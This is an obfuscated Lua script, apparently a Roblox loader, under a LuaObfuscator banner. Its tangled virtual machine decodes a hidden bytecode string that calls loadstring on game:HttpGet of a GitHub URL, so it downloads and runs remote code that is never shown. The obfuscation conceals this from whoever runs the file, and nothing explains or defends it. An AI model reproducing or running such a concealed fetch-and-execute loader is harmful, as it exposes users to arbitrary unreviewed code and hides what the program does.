--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to :3   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v39=1785 -(1657 + 128) ;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v66=0 -0 ;local v67;while true do if ((317 -(308 + 9))~=v66) then else v67=0 -0 ;while true do if (v67~=(3 -2)) then else if (v39==(2 -1)) then v43={v40,v41,nil,v42};v44=v24();v45={};v39=1 + 1 ;end if (v39==(43 -(15 + 25))) then for v103=1,v24() do v41[v103-1 ]=v29();end for v105=1558 -(1152 + 405) ,v24() do v42[v105]=v24();end return v43;end break;end if ((712 -(688 + 24))==v67) then if (v39~=(2 + 0)) then else for v107=1 + 0 ,v44 do local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==(1183 -(42 + 1139))) then while true do if (v109~=(0 + 0)) then else local v121=0;while true do if (v121==0) then v110=0;v111=nil;v121=1;end if (1~=v121) then else v109=34 -(17 + 16) ;break;end end end if (v109~=1) then else v112=nil;while true do if (1==v110) then if (v111==1) then v112=v22()~=(1611 -(202 + 1409)) ;elseif (v111==(2 + 0)) then v112=v25();elseif (v111==(1 + 2)) then v112=v26();end v45[v107]=v112;break;end if (v110==0) then local v129=0;while true do if (v129==1) then v110=1;break;end if (v129==(0 + 0)) then local v148=0;while true do if (v148==0) then v111=v22();v112=nil;v148=1 + 0 ;end if (v148~=(1 + 0)) then else v129=1 + 0 ;break;end end end end end end break;end end break;end if (v108~=(0 + 0)) then else v109=0;v110=nil;v108=1;end if (v108~=1) then else v111=nil;v112=nil;v108=2;end end end v43[4 -1 ]=v22();for v113=1,v24() do local v114=0 -0 ;local v115;local v116;while true do if (v114==1) then while true do if (v115==(1441 -(126 + 1315))) then v116=v22();if (v21(v116,1,1439 -(1019 + 419) )==0) then local v122=0;local v123;local v124;local v125;local v126;local v127;while true do if (v122==(0 -0)) then v123=1161 -(1132 + 29) ;v124=nil;v122=1;end if (v122==(2 + 0)) then v127=nil;while true do if (v123==0) then v124=0;v125=nil;v123=1469 -(541 + 927) ;end if (v123~=2) then else while true do if ((3 -0)~=v124) then else if (v21(v126,3,1 + 2 )~=1) then else v127[14 -10 ]=v45[v127[4]];end v40[v113]=v127;break;end if (v124==(3 -1)) then local v154=1754 -(1317 + 437) ;while true do if (v154==1) then v124=116 -(70 + 43) ;break;end if (v154==0) then if (v21(v126,1,274 -(252 + 21) )==(1 + 0)) then v127[2]=v45[v127[3 -1 ]];end if (v21(v126,1384 -(361 + 1021) ,2)==1) then v127[10 -7 ]=v45[v127[3]];end v154=1;end end end if (v124==(1265 -(933 + 331))) then local v155=0;while true do if ((1 + 0)~=v155) then else v124=2;break;end if (v155~=0) then else v127={v23(),v23(),nil,nil};if (v125==(0 -0)) then local v175=0 -0 ;while true do if (v175==0) then v127[3]=v23();v127[4]=v23();break;end end elseif (v125==1) then v127[1893 -(1461 + 429) ]=v24();elseif (v125==2) then v127[3]=v24() -((5 -3)^16) ;elseif (v125==3) then local v184=0;while true do if (v184==0) then v127[3]=v24() -((3 -1)^(50 -34)) ;v127[4]=v23();break;end end end v155=705 -(334 + 370) ;end end end if (v124~=(976 -(154 + 822))) then else local v156=0 + 0 ;while true do if (v156==1) then v124=1174 -(774 + 399) ;break;end if (v156==0) then v125=v21(v116,2 + 0 ,3);v126=v21(v116,4,6);v156=1;end end end end break;end if (v123==1) then v126=nil;v127=nil;v123=2;end end break;end if (v122~=(1 + 0)) then else v125=nil;v126=nil;v122=2 + 0 ;end end end break;end end break;end if (v114==0) then local v117=0 -0 ;while true do if (v117==(1 + 0)) then v114=1;break;end if (v117==0) then v115=0 + 0 ;v116=nil;v117=1 + 0 ;end end end end end v39=3;end if (v39~=0) then else local v101=0 + 0 ;local v102;while true do if (0==v101) then v102=749 -(459 + 290) ;while true do if (v102~=1) then else v42={};v39=1 + 0 ;break;end if (v102==0) then local v118=712 -(355 + 357) ;while true do if (v118~=(1 + 0)) then else v102=1;break;end if (v118==0) then v40={};v41={};v118=1;end end end end break;end end end v67=1;end end break;end end end end;v18=5;end if (5==v18) then v30=nil;v30=function(v31,v32,v33)local v46=v31[1];local v47=v31[2];local v48=v31[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==3) then A,B=v28(v11(v73));if  not A[1] then local v91=v31[4][v69] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v68==1) then v71={...};v72=v12("#",...) -1 ;v68=2;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==2) then v73=nil;v73=function()local v81=v46;local v82=v47;local v83=v48;local v84=v28;local v85={};local v86={};local v87={};for v92=0 + 0 + 0 ,v72 do if ((v92>=v83) or ((7037 -3683)==(7393 -4769))) then v85[v92-v83 ]=v71[v92 + 1 + 0 ];else v87[v92]=v71[v92 + 1 ];end end local v88=(v72-v83) + (425 -(82 + 342)) ;local v89;local v90;while true do local v93=1833 -(839 + 994) ;local v94;local v95;while true do if ((v93==(0 + 0)) or (1712>=3764)) then v94=0 + 0 ;v95=nil;v93=1 + 0 ;end if (((5033 -(282 + 606))<4524) and (v93==(1 + 0))) then while true do if (((3706 -(1096 + 688))>=(15 + 357)) and (v94==((746 -(677 + 69)) + 0))) then v95=0;while true do if ((v95==(1 + 0)) or (634==2587)) then if ((664<(5459 -917)) and (v90<=(3 -1))) then if ((1040<=(12210 -7714)) and (v90<=(0 + 0))) then local v130=1217 -(1046 + 29 + 142) ;local v131;while true do if (((109 -(38 + 71))==v130) or ((2051 -(249 + 994))>(9176 -6280))) then v131=v89[5 -3 ];v87[v131]=v87[v131](v13(v87,v131 + 1 + 0 ,v70));break;end end elseif ((v90==1) or ((4138 -(474 + 301))>(2585 + 2362))) then v87[v89[2]]();else v87[v89[8 -6 ]]=v33[v89[3]];end elseif (((2080 + 817)<=(1177 + 3585)) and (v90<=(4 + 0))) then if ((3285>=(3801 -(438 + (1006 -(225 + 11))))) and (v90>(788 -(628 + 157)))) then v87[v89[2 + 0 ]]=v89[3];else do return;end end elseif ((v90>(961 -(376 + 580))) or ((5544 -(403 + 237))<=(2638 -(485 + 1355)))) then local v136=0 + 0 ;local v137;local v138;local v139;local v140;local v141;while true do if (((2053 -(2753 -(1150 + 172)))<=((3209 -(77 + 1347)) -(498 + 273))) and ((3 -1)==v136)) then v141=nil;while true do if ((v137==(1 + 1)) or (370>(12451 -8297))) then for v160=v138,v70 do local v161=0 + 0 ;local v162;while true do if ((v161==(339 -(34 + 305))) or ((2820 -1784)==(2273 -1287))) then v162=0 -0 ;while true do if ((v162==(0 + 0)) or (3464>(3611 -(85 + 37)))) then v141=v141 + 1 + 0 + 0 ;v87[v160]=v139[v141];break;end end break;end end end break;end if (((2577 + 980)>(1922 + 1048)) and (v137==(396 -(96 + 299)))) then local v157=0;while true do if (((933 + 213)<=(736 + 2285)) and (v157==(0 + 0))) then v70=(v140 + v138) -(4 -3) ;v141=0 + 0 ;v157=2 -1 ;end if (((91 + 131 + 96)==(401 -83)) and (v157==(1 + 0))) then v137=2 + 0 ;break;end end end if ((v137==0) or ((9415 -4595)<(4039 -(300 + 1552)))) then local v158=0 -0 ;while true do if ((v158==(2 -1)) or (2064==(3352 -(65 + 114)))) then v137=(2 + 2) -3 ;break;end if (((420 + 494)<(3560 -(328 + 107))) and (v158==0)) then v138=v89[2];v139,v140=v84(v87[v138](v13(v87,v138 + (3 -2) ,v89[(1884 -1045) -(807 + 29) ])));v158=3 -2 ;end end end end break;end if ((v136==1) or ((252 + 863)<(1629 -996))) then v139=nil;v140=nil;v136=1682 -(719 + 961) ;end if ((v136==(0 + 0 + 0)) or ((11484 -7414)>=4692)) then v137=31 -(10 + 21) ;v138=nil;v136=1 + (179 -(29 + 150)) ;end end else local v142=0 + 0 + 0 ;local v143;local v144;local v145;local v146;while true do if ((v142==(1147 -(687 + 460))) or ((3136 -((1142 -554) + 32))>(1552 + 3040))) then v143=298 -(223 + 75) ;v144=nil;v142=1;end if (((1 -0)==v142) or (4637<=(2108 -(988 + 241 + 49)))) then v145=nil;v146=nil;v142=1323 -(1203 + (167 -49)) ;end if (((5551 -(873 + 124))<=((4151 -(453 + 132)) + 1337)) and (v142==(1705 -(864 + 839)))) then while true do if (((5210 -(220 + 483))==(5680 -(500 + 630 + 43))) and (v143==0)) then local v159=0 + 0 ;while true do if (((11488 -7617)<=(4019 + 262)) and (v159==0)) then v144=(691 -(462 + 229)) -0 ;v145=nil;v159=2 -1 ;end if (((3324 -(312 + 172))<=(5407 -(1267 + 550))) and (v159==(568 -(193 + 374)))) then v143=1 + 0 ;break;end end end if ((v143==1) or ((11426 -7310)<888)) then v146=nil;while true do if (((0 -0)==v144) or ((2113 + 2736)<3933)) then local v166=0;local v167;while true do if ((v166==(0 + 0)) or ((5175 -((2453 -1505) + 319))<=(12150 -8393))) then v167=847 -(610 + 237) ;while true do if (((5244 -1645)>=(4993 -(4618 -(1593 + 248)))) and (v167==(0 + 0))) then v145=v89[1271 -(333 + 194 + 742) ];v146=v87[v89[1 + 2 ]];v167=1 + 0 ;end if ((v167==1) or ((909 + 1161)==(3278 + 822))) then v144=(2 -0) -(1 + 0) ;break;end end break;end end end if ((v144==1) or ((4422 -(1167 + 248))==(674 -(142 + 173)))) then v87[v145 + 1 ]=v146;v87[v145]=v146[v89[4]];break;end end break;end end break;end end end v69=v69 + 1 ;break;end if ((v95==(256 -(13 + 243))) or ((2921 -(1259 + 60))>(1199 + 630 + 1689))) then local v119=862 -(575 + 287) ;local v120;while true do if (((1258 + (2619 -(776 + 754)))==(39 + 2308)) and ((0 -0)==v119)) then v120=271 -((333 -228) + 166) ;while true do if ((v120==(1 + 0)) or (3000<=(419 -274))) then v95=1 + 0 + (382 -(27 + 355)) ;break;end if ((v120==(45 -(29 + 16))) or (((7192 -2320) -2220)>=(900 + 1491 + 632))) then local v147=0 + 0 ;while true do if (((1 + 0)==v147) or ((5760 -3385)<(213 + 41))) then v120=1;break;end if (((6569 -3497)>=(1565 + 1068)) and (v147==(0 + 0))) then v89=v81[v69];v90=v89[1];v147=(3559 -(573 + 1023)) -(859 + 1103) ;end end end end break;end end end end break;end end break;end end end end;v68=3;end end end;end;return v30(v29(),{},v17)(...);end if (v18==3) then v25=function()local v49=v24();local v50=v24();local v51=1999 -(706 + 1292) ;local v52=(v21(v50,2 -1 ,20) * ((3 -1)^(1247 -(243 + 972)))) + v49 ;local v53=v21(v50,2004 -(1230 + 753) ,108 -77 );local v54=((v21(v50,11 + 21 )==1) and  -(4 -3)) or ((1000 -(359 + 640)) + 0) ;if (v53==(1246 -(970 + 276))) then if (v52==((1672 -(975 + 165)) -(276 + 256))) then return v54 * (224 -(150 + 74)) ;else v53=(2 -1) + 0 ;v51=603 -(188 + 415) ;end elseif (v53==2047) then return ((v52==(0 + (621 -(384 + 237)))) and (v54 * (1/(0 + 0)))) or (v54 * NaN) ;end return v8(v54,v53-(618 + (1179 -(170 + 604))) ) * (v51 + (v52/((4 -2)^(1891 -(1749 + 90))))) ;end;v26=nil;v26=function(v34)local v55=0 -0 ;local v56;local v57;while true do if ((5 -3)==v55) then v57={};for v78=3 -2 , #v56 do v57[v78]=v2(v1(v3(v56,v78,v78)));end v55=1528 -(260 + 1265) ;end if (v55==(231 -((267 -177) + 141))) then v56=nil;if  not v34 then v34=v24();if (v34==(0 + (0 -0))) then return "";end end v55=1 + 0 ;end if (v55==3) then return v6(v57);end if (v55==(1 -0)) then v56=v3(v16,v19,(v19 + v34) -(948 -(464 + 483)) );v19=v19 + v34 ;v55=1 + 1 ;end end end;v27=v24;v18=4;end if (v18==2) then v23=function()local v58,v59=v1(v16,v19,v19 + (3 -1) );v19=v19 + 1 + 1 ;return (v59 * (533 -(233 + 44))) + v58 ;end;v24=nil;v24=function()local v60=1692 -(1516 + 176) ;local v61;local v62;local v63;local v64;while true do if ((1148 -(127 + 737 + 283))==v60) then return (v64 * (54446087 -37668871)) + (v63 * (186988 -121452)) + (v62 * (114 + 142)) + v61 ;end if (v60==(978 -(493 + (1340 -(667 + 188))))) then v61,v62,v63,v64=v1(v16,v19,v19 + (14 -11) );v19=v19 + 4 ;v60=1 + 0 ;end end end;v25=nil;v18=3;end if (1==v18) then v21=function(v35,v36,v37)if v37 then local v74=0 + 0 ;local v75;while true do if (v74==(926 -(787 + 139))) then v75=(v35/((566 -((824 -476) + 114 + 102))^(v36-(4 -(1189 -(810 + 376))))))%((1 + 1)^(((v37-(2 -1)) -(v36-(1 -0))) + 1 + 0)) ;return v75-(v75%(667 -((1274 -(433 + 341)) + 166))) ;end end else local v76=(3 -(1 + 0))^(v36-(1 + 0)) ;return (((v35%(v76 + v76))>=v76) and (184 -(37 + 146))) or (0 + 0) ;end end;v22=nil;v22=function()local v65=v1(v16,v19,v19);v19=v19 + 1 ;return v65;end;v23=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v77=v2(v0(v38,16));if v20 then local v80=v5(v77,v20);v20=nil;return v80;else return v77;end end end);v21=nil;v18=1;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403333O00682O7470733A2O2F6769746875622E636F6D2F2O6C6F6C6F616B792F6C6F6C6F6B612F626C6F622F6D61696E2F6C616C646B6100083O0012023O00013O001202000100023O002005000100010003001204000300044O0006000100039O0000022O00013O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
